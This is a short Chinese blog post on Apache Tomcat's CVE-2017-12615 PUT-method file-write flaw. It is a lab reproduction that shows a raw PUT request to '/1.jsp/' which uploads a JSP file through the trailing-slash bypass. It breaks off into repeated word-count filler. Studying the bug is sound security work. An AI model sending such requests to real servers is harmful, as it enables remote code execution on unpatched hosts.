tomcat的put方法任意文件写入漏洞浅谈
1. 漏洞花絮
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
2.漏洞复现
首先我们搭建好漏洞复现环境
http://192.168.36.146:8080/
然后我们抓包拦截
接着我们修改请求包为如下代码
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
然后我们执行操作后进行如下操作即可复现这个漏洞了
此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!此处为凑字数!!!